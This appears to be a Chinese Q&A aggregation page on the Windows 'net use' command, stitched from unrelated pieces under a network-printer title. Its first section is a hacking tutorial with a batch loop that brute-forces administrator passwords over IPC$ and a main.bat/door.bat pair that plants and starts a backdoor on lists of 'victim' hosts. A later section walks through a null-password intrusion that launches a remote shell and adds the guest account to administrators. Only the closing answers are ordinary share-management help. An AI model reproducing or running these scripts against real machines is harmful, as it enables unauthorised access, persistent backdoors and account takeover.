net use删除所有连接（批处理问题,关于安装网络打印机的问题）

本文目录

• 批处理问题,关于安装网络打印机的问题
• 我公司电脑系统提示：不允许一个用户使用一个以上用户名与服务器或共享资源的多重连接
• 局域网访问如何更改使用之前的帐户和密码
• 网络中的“NET“命令应该如何使用呢
• 用net use进行ipc$连接的作用是什么
• 输入cmd删除文件共享的方法

批处理问题,关于安装网络打印机的问题

一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显 设置。 语法 echo Sample：@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用》 》》 ^）结合来实 现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让 对方看到你使用的命令啦。 Sample：@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留 了个autoset这个参数给我们，效果和/y是一样的。) 3.Goto 命令 指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。 语法：goto label （label是参数，指定所要转向的批处理程序中的行。） Sample： if {%1}=={} goto noparms if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详 细的解释。） @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标 签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来 才会理解你的意图啊。 4.Rem 命令 注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于 别人阅读和你自己日后修改。 Rem Message Sample：@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时，将显示下面的消息： Press any key to continue . . . Sample： @echo off :begin copy a:*.* d：\back echo Please put a new disk into driver A pause goto begin 在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另 一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续 处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调 用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。 语法 call 参数 FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数： MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如 果在命令脚本内执行，该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数， c:后应写提示可输入的字符，之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end? Sample： Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag （应先判断数值最高的错误码） if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye 此文件运行后，将显示 defrag,mem,end? 用户可选择d m e ，然后if语句将作出 判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号 为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。 9.If 命令 if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号） 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名 待执行的命令 如果有指定的文件，则条件成立，运行命令，否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回 码为0、1。 10.for 命令 for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable for {%variable|%%variable} in (set) do command %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I 如果命令扩展名被启用，下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command 如果集中包含通配符，则指定与目录名匹配，而不与文件 名匹配。 FOR /R %variable IN (set) DO command [command- 检查以 path 为根的目录树，指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录，则使用当前 目录。如果集仅为一个单点(.)字符，则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F %variable IN (file-set) DO command FOR /F %variable IN ("string") DO command FOR /F %variable IN (’command’) DO command 或者，如果有 usebackq 选项: FOR /F %variable IN (file-set) DO command FOR /F %variable IN ("string") DO command FOR /F %variable IN (’command’) DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前，每份文件都已被打开、读取并经过处理。 处理包括读取文件，将其分成一行行的文字，然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号， 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将 每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或 空格定界符号。请注意，这个 for 程序体的语句引用 %i 来 取得第二个符号，引用 %j 来取得第三个符号，引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名，您需要用双引号将文件名括起来。为了用这种方式来使 用双引号，您还需要使用 usebackq 选项，否则，双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明，%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号，只要不试图说明一个高于字母 ’z’ 或 ’Z’ 的变量。请记住，FOR 变量是单一字母、分大小写和全局的； 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是， 用单引号将括号之间的 filenameset 括起来。这样，该字符 串会被当作一个文件中的一个单一输入行。 最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进 内存，并被当作文件分析。因此，以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外，FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号(")，扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义，或者没有找到文件，此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读，而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2： 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接， 当成功时记下密码。 最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程 序运行结果传递给find命令－－ for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命 令成功完成"》》D:\ok.txt ，这样就ko了。 sample3： 你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心 的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。 那么如何实现呢？呵呵，看下去你就会明白了。 主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable） @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给 door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim， 然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到 指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这 victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。 代码雏形： --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 》》ko.txt @psexec \\%1 c:\winnt\system32\windrv32.exe @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored 》》ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe 需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之 具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二.如何在批处理文件中使用参数 批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这 种情况并不多见，我们就不考虑它了。 sample1：fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵, 好像有点画蛇添足了～^_^ sample2： 当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把 一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处 理，这样就不用每次都打命令了。 @echo off @net use \\1%\ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧？你这么帅一定学会了^_^. 三.如何使用组合命令(Compound Command) 1.& Usage：第一条命令 & 第二条命令 用这种方法可以同时执行多条命令，而不管命令是否执行成功 Sample： C:\》dir z: & dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:51 《DIR》 . 2002-05-14 23:51 《DIR》 .. 2002-05-14 23:51 14 sometips.gif 2.&& Usage：第一条命令 && 第二条命令 用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一 直没有出错则一直执行完所有命令； Sample： C:\》dir z: && dir c:\Ex4rch The system cannot find the path specified. C:\》dir c:\Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:55 《DIR》 . 2002-05-14 23:55 《DIR》 .. 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单，如： dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy 命令。这种用法可以替换IF exist了 ：） 3.|| Usage：第一条命令 || 第二条命令 用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没 有出现正确的命令则一直执行完所有命令； Sample： C:\Ex4rch》dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:\Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子： sample： @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 》》victim.txt 四、管道命令的使用 1.| 命令 Usage：第一条命令 | 第二条命令 将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。 sample： time /t》》D:\IP.log netstat -n -p tcp|find ":3389"》》D:\IP.log start Explorer 看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个 bat，以获得登录用户的IP。 2.》、》》输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中, 》 与 》》的区别在于，》会清除调原 有文件中的内容后写入指定文件，而》》只会追加内容到指定文件中，而不会改动其中的内容。 sample1： echo hello world》c:\hello.txt (stupid example?) sample2: 时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里 钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下 的EXE和DLL文件作一个记录： 运行CMD--转换目录到system32--dir *.exe》exeback.txt & dir *.dll》dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和 dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt》diff.txt & fc dllback.txt dllback1.txt》diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到 diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版 本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好， 如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把 它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 3.《 、》& 、《& 《 从文件中而不是从键盘中读入命令输入。 》& 将一个句柄的输出写入到另一个句柄的输入中。 《& 从一个句柄读取输入并将其写入到另一个句柄输出中。 这些并不常用，也就不多做介绍。

我公司电脑系统提示：不允许一个用户使用一个以上用户名与服务器或共享资源的多重连接

1.问题描述：在连接VSS时要用到ipc连接，在断开连接后再次使用命令net use \\10.11.1.2\ipc$ /user:dmnm\usr "pwd"连接有时会出现下面的错误提示：不允许一个用户使用一个以上用户名与服务器或共享资源的多重连接。中断与此服务器或共享资源的所有连接，然后再试一次。2.发生原因：这前曾与主机10.11.1.2有过连接，连接断开后操作系统未将连接状态清除3.解决方法：用命令：net use * /del /y中断开所有连接，再使用命令：net use \\10.11.1.2\ipc$ /user:dmnm\usr "pwd"连接时就不会出现上述问题了。

局域网访问如何更改使用之前的帐户和密码

开始--运行:输入:net session \\计算机名或IP地址 /delete或者:一:1. 单击“开始”，单击“运行”，键入“control userpasswords2”或　输入“control keymgr.dll”，然后按 Enter。2. 单击“高级”选项卡，然后单击“管理密码”。3. 移除所有存储的密码。二:是使用net use * /d删除所有的已有连接，都需要重新启动计算机才会在访问该共享文件夹的时候，重新出现输入用户名和密码的提示。如果您不希望重启计算机的话，可以重启“workstation”服务来进行测试

网络中的“NET“命令应该如何使用呢

很多，简单说一下：1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推) 如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del 删除全部,会有提示要求按y确认 3 查看远程主机的共享资源（但看不到默认共享） net view \\IP 4 查看本地主机的共享资源（可以看到本地的默认共享） net share 5 得到远程主机的用户名列表 nbtstat -A IP 6 得到本地主机的用户列表 net user 7 查看远程主机的当前时间 net time \\IP 8 显示本地主机当前服务 net start 9 启动/关闭本地服务 net start 服务名 /y net stop 服务名 /y 10 映射远程共享: net use z: \\IP\baby 此命令将共享名为baby的共享资源映射到z盘 11 删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del /y删除全部 12 向远程主机复制文件 copy \路径\srv.exe \\IP\共享目录名，如： copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 13 远程添加计划任务 at \\ip 时间 程序名，如： at \\127.0.0.0 11:00 love.exe 注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径 14 开启远程主机的telnet 这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求： 1）目标开启了ipc$共享 2）你要拥有管理员密码和帐号 3）目标开启RemoteRegistry服务，用户就该ntlm认证 4）对WIN2K/XP有效，NT未经测试 命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port 试例如下：c:\》OpenTelnet.exe \\*.*.*.* administrator "" 1 90 15 激活用户/加入管理员组 1 net uesr account /active:yes 2 net localgroup administrators account /add 16 关闭远程主机的telnet 同样需要一个小程序：ResumeTelnet.exe 命令格式：ResumeTelnet.exe \\server account psw 试例如下：c:\》ResumeTelnet.exe \\*.*.*.* administrator "" 17 删除一个已建立的ipc$连接 net use \\IP\ipc$ /del 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 1. C:\》net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。 复制之前务必用net view \\IP这个命令看一下对方的共享情况 2. C:\》copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 3. C:\》net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。 4. C:\》at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 5. C:\》net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。 6. C:\》telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 7.C:\》copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。 8. C:\WINNT\system32》ntlm 输入ntlm启动（这里的C:\WINNT\system32》指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！ 9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\》net user guest /active:yes 将对方的Guest用户激活 11. C:\》net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\》net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) 另外,你也可以根据返回的错误号分析原因： 错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限； 错误号51，Windows无法找到网络路径：网络有问题； 错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连； 错误号1326，未知的用户名或错误密码：原因很明显了； 错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动； 错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码

用net use进行ipc$连接的作用是什么

用来连接其电脑共享时输入用户名和密码语法下:netuse\\ip\ipc$"密码"/user:"用户名"建立IPC非空链接netuseh:\\ip\c$"密码"/user:"用户名"直接登陆映射对方C:本地H:netuse\\ip\ipc$/del删除IPC链接删除了连接能映射了除非电脑没有设置密码

输入cmd删除文件共享的方法

net share 共享名=盘：\文件夹\文件夹

共享是：net share my44=c:\44

删除是：net share my44 /DELETE